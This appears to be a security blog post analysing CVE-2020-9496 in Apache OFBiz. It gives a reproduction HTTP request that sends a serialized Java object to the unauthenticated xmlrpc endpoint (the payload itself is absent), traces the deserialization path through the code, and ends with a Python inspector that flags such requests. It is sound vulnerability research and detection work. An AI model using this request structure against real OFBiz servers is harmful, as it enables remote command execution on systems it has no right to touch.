March 8, 2024

CVE-2020-9496 Apache OFBiz Deserialization Command Execution Vulnerability

Affected versions

OFBiz < 17.12.04

Environment setup

Download OFBiz and Gradle, set the Gradle environment variable, then run gradle.bat directly to build, and finally run ./gradlew ofbiz --debug-jvm.
The debug port defaults to 5005.
Alternatively, open the project in IDEA and initialize it as a Gradle project.
You will see a build task; once it has compiled, an ofbiz.jar appears.
Then run that jar and you can start debugging.
When I wanted to debug I found that vulhub exposes port 5005 but does not enable debug mode... I hope vulhub adds debug support later.

Vulnerability reproduction

GET /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Cookie: JSESSIONID=F637D1919F66DD42EED9EFF4B139CF3A.jvm1; Phpstorm-b3ad9363=84c4b31e-d5ed-4379-9a80-9b7507cedf1e; Pycharm-69800360=084fccb6-8efb-4ce0-ab83-e9ee9ec90c09; confluence.browse.space.cookie=space-blogposts; sidebar_collapsed=false; Goland-7a35ec7=48e3d45f-8c3b-456a-b871-9a45c9c01e45; cookie_token=ca76b89a250a514dd21370f8310865e199423e79b5b53392404ae1bb2ab24a8c; Phpstorm-b3ad9726=1202f496-542d-4162-91ec-bad957f445b9; lang=zh-cn; device=desktop; theme=default; OFBiz.Visitor=10000
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 1697

<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">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</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

Sending this packet to the xmlrpc endpoint pops the calculator; the base64 is the CB (commons-beanutils) gadget chain.

Vulnerability analysis

The flow is fairly simple; it stems from an endpoint that lacks authorization.
From the vulnerable URL /webapps/control/xmlrpc we can find web.xml and see that the request is handled by ControlServlet.
So we locate the doGet method; the first thing it does is obtain a RequestHandler.
That reads controller.xml; let's look at its contents.
We find that security for the xmlrpc route is false, i.e. the route requires no authentication, which is what makes the rest of the exploitation possible.
After doGet we enter the doRequest method,
and from there the runEvent method.
Entering XmlrpcRequestHandler's execute method, it first obtains the xmlrpc config and then reads the body stream.
Finally the body is handed to SAXParsers for processing.
While scanning the XML tags it enters the getParser method to obtain the parser for the corresponding tag.
If the tag is serializable it returns a SerializableParser.
Its parent class is ByteArrayParser, which eventually calls the startElement method.
Here our base64 data is decoded. Finally, deserialization takes place in SerializableParser's getResult method.
OFBiz bundles the commons-beanutils (cb) dependency, so the CB chain can be used.
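Added example (not from the original post or the OFBiz project): a Python inspector, usable in a WAF hook or over captured request bodies, that looks for the Apache XML-RPC <serializable> extension element the trace above ends in, base64-decodes it and checks for the Java serialization stream header. The two request bodies are constructed, and the function and verdict names are my own.

```python
import base64
import xml.etree.ElementTree as ET

# Namespace of the Apache XML-RPC extensions. A <serializable> element in this
# namespace carries a base64-encoded Java object: the input that ByteArrayParser
# decodes and SerializableParser.getResult() deserializes, as traced above.
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
SERIALIZABLE_TAG = "{%s}serializable" % XMLRPC_EXT_NS
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java ObjectOutputStream header
MAX_BODY = 1 << 20  # oversized bodies are not parsed by this inspector

def find_serializable_payloads(body: bytes):
    """Return the decoded bytes of each <serializable> element in an XML-RPC body."""
    if len(body) > MAX_BODY:
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    if root.tag != "methodCall":
        return []
    payloads = []
    for el in root.iter(SERIALIZABLE_TAG):
        text = "".join((el.text or "").split())  # base64 may be line-wrapped
        try:
            payloads.append(base64.b64decode(text, validate=True))
        except ValueError:
            payloads.append(b"")  # undecodable, but the element is still a hit
    return payloads

def classify_request(path: str, body: bytes) -> str:
    """'block' for a Java object stream aimed at a /control/xmlrpc endpoint,
    'suspicious' for any <serializable> element elsewhere, otherwise 'allow'."""
    payloads = find_serializable_payloads(body)
    if not payloads:
        return "allow"
    is_xmlrpc = path.split("?", 1)[0].rstrip("/").endswith("/control/xmlrpc")
    if is_xmlrpc and any(p.startswith(JAVA_STREAM_MAGIC) for p in payloads):
        return "block"
    return "suspicious"

# Constructed samples (hypothetical, no real gadget chain): a benign call and one smuggling a Java object stream.
BENIGN_BODY = (b'<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
               b'<params><param><value><string>hi</string></value></param></params></methodCall>')
_fake_object = base64.b64encode(JAVA_STREAM_MAGIC + b"\x73\x72PLACEHOLDER").decode()
MALICIOUS_BODY = ('<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
                  '<params><param><value><struct><member><name>test</name><value>'
                  '<serializable xmlns="%s">%s</serializable></value></member></struct>'
                  '</value></param></params></methodCall>' % (XMLRPC_EXT_NS, _fake_object)).encode()
```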

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#Java#CVE